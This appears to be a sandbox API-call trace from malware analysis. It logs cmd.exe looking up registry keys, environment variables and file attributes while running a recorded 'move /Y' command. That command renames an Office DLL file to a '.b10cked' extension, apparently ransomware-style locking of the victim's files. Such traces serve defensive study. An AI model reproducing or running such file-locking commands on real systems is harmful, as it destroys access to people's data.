"pagefile_0x00000000011b0000" filename = "" Thread: id = 316 os_tid = 0xe94 [0153.473] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fea4 | out: lpSystemTimeAsFileTime=0x20fea4*(dwLowDateTime=0x95694d80, dwHighDateTime=0x1d440a9)) [0153.473] GetCurrentProcessId () returned 0xd6c [0153.473] GetCurrentThreadId () returned 0xe94 [0153.473] GetTickCount () returned 0x2f46c [0153.473] QueryPerformanceCounter (in: lpPerformanceCount=0x20fe9c | out: lpPerformanceCount=0x20fe9c*=21026218833) returned 1 [0153.474] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0153.474] __set_app_type (_Type=0x1) [0153.474] __p__fmode () returned 0x76b331f4 [0153.474] __p__commode () returned 0x76b331fc [0153.474] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0153.474] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0153.474] GetCurrentThreadId () returned 0xe94 [0153.474] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe94) returned 0x38 [0153.474] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.474] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0153.474] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.475] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.475] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fe34 | out: phkResult=0x20fe34*=0x0) returned 0x2 [0153.475] VirtualQuery (in: lpAddress=0x20fe6b, lpBuffer=0x20fe04, dwLength=0x1c | out: lpBuffer=0x20fe04*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.475] VirtualQuery (in: 
lpAddress=0x110000, lpBuffer=0x20fe04, dwLength=0x1c | out: lpBuffer=0x20fe04*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.475] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fe04, dwLength=0x1c | out: lpBuffer=0x20fe04*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.475] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fe04, dwLength=0x1c | out: lpBuffer=0x20fe04*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.475] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fe04, dwLength=0x1c | out: lpBuffer=0x20fe04*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0153.475] GetConsoleOutputCP () returned 0x1b5 [0153.475] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.475] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0153.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.475] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0153.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.475] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.476] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.476] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.476] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.476] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0153.476] GetEnvironmentStringsW () returned 0x2e0210* [0153.476] FreeEnvironmentStringsW 
(penv=0x2e0210) returned 1 [0153.477] GetEnvironmentStringsW () returned 0x2e0210* [0153.477] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0153.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eda4 | out: phkResult=0x20eda4*=0x40) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0xa0, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x1, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0x1, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x0, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x40, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x40, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0x40, 
lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.477] RegCloseKey (hKey=0x40) returned 0x0 [0153.477] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eda4 | out: phkResult=0x20eda4*=0x40) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0x40, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x1, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0x1, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x0, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x9, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x9, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.478] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0x9, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.478] RegCloseKey (hKey=0x40) 
returned 0x0 [0153.478] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637c [0153.478] srand (_Seed=0x5b88637c) [0153.478] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked\"" [0153.478] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked\"" [0153.478] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.478] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0153.478] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0153.478] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.478] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.478] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.479] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.479] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.479] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.479] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.479] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.479] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0153.479] _wcsicmp 
(_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.479] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0153.479] GetEnvironmentStringsW () returned 0x2e2360* [0153.479] FreeEnvironmentStringsW (penv=0x2e2360) returned 1 [0153.479] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.479] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.479] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.479] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.479] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.479] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.479] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.479] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.479] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.479] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.479] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fb70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.479] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fb70, lpFilePart=0x20fb6c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fb6c*="Desktop") returned 0x18 [0153.479] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.480] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f8ec | out: lpFindFileData=0x20f8ec) returned 0x2e09f0 [0153.480] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0153.480] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f8ec | out: lpFindFileData=0x20f8ec) returned 0x2e09f0 [0153.480] FindClose (in: hFindFile=0x2e09f0 
| out: hFindFile=0x2e09f0) returned 1 [0153.480] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f8ec | out: lpFindFileData=0x20f8ec) returned 0x2e09f0 [0153.480] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0153.480] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.480] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0153.480] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0153.481] GetEnvironmentStringsW () returned 0x2e0210* [0153.481] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0153.481] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.481] GetConsoleOutputCP () returned 0x1b5 [0153.481] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.481] GetUserDefaultLCID () returned 0x409 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fcb0, cchData=128 | out: lpLCData="0") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fcb0, cchData=128 | out: lpLCData="0") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fcb0, cchData=128 | out: lpLCData="1") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0153.483] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.484] GetConsoleTitleW (in: lpConsoleTitle=0x2d0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.484] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.484] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0153.484] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0153.484] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0153.485] _wcsicmp (_String1="move", _String2=")") returned 68 [0153.485] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0153.485] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0153.485] _wcsicmp (_String1="IF", _String2="move") returned -4 [0153.485] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0153.485] _wcsicmp (_String1="REM", _String2="move") returned 5 [0153.485] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0153.489] GetConsoleTitleW (in: lpConsoleTitle=0x20f9a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0153.576] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0153.576] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0153.576] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0153.576] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0153.576] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0153.576] _wcsicmp (_String1="move", _String2="CD") returned 10 [0153.576] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0153.576] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0153.576] _wcsicmp (_String1="move", _String2="REN") returned -5 [0153.576] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0153.576] _wcsicmp (_String1="move", _String2="SET") returned -6 [0153.576] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0153.576] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0153.576] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0153.576] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0153.576] _wcsicmp (_String1="move", _String2="MD") returned 11 [0153.576] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0153.576] _wcsicmp (_String1="move", _String2="RD") returned -5 [0153.576] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0153.576] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0153.576] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0153.576] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0153.576] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0153.576] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0153.576] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0153.576] _wcsicmp (_String1="move", _String2="VER") returned -9 [0153.576] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0153.576] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0153.577] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0153.577] _wcsicmp (_String1="move", 
_String2="ENDLOCAL") returned 8 [0153.577] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0153.577] _wcsicmp (_String1="move", _String2="START") returned -6 [0153.577] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0153.577] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0153.577] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0153.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.578] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.578] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f764, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f75c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f75c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0153.579] _wcsnicmp 
(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.579] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.580] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.580] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0153.580] _wcsicmp (_String1="MAPIRD~1.TRX", _String2=".") returned 63 [0153.580] _wcsicmp (_String1="MAPIRD~1.TRX", _String2="..") returned 
63 [0153.580] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapird~1.trx")) returned 0x2020 [0153.581] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e1f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.581] SetErrorMode (uMode=0x0) returned 0x0 [0153.581] SetErrorMode (uMode=0x1) returned 0x0 [0153.581] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", nBufferLength=0x104, lpBuffer=0x20f0ec, lpFilePart=0x20f0d4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", lpFilePart=0x20f0d4*="MAPIRD~1.TRX") returned 0x3c [0153.581] SetErrorMode (uMode=0x0) returned 0x1 [0153.581] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0153.581] _wcsicmp (_String1="MAPIRD~1.TRX", _String2=".") returned 63 [0153.581] _wcsicmp (_String1="MAPIRD~1.TRX", _String2="..") returned 63 [0153.581] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapird~1.trx")) returned 0x2020 [0153.581] SetErrorMode (uMode=0x0) returned 0x0 [0153.581] SetErrorMode (uMode=0x1) returned 0x0 [0153.581] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", nBufferLength=0x104, lpBuffer=0x20f568, lpFilePart=0x20f300 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", lpFilePart=0x20f300*="MAPIRD~1.TRX") returned 0x3c [0153.581] SetErrorMode (uMode=0x0) returned 0x1 [0153.582] SetErrorMode (uMode=0x0) returned 0x0 [0153.582] SetErrorMode (uMode=0x1) returned 0x0 [0153.582] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f770, lpFilePart=0x20f300 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked", lpFilePart=0x20f300*="MAPIR.DLL.trx_dll.b10cked") returned 0x49 [0153.582] SetErrorMode (uMode=0x0) returned 0x1 [0153.582] SetLastError (dwErrCode=0x0) [0153.582] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mapir.dll.trx_dll.b10cked")) returned 0xffffffff [0153.582] GetLastError () returned 0x2 [0153.582] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x20ec7c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec7c) returned 0x2e2128 [0153.582] FindNextFileW (in: hFindFile=0x2e2128, lpFindFileData=0x20ec7c | out: lpFindFileData=0x20ec7c) returned 0 [0153.583] GetLastError () returned 0x12 [0153.583] FindClose (in: hFindFile=0x2e2128 | out: hFindFile=0x2e2128) returned 1 [0153.584] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2e1cb8, fSearchOp=0x0, 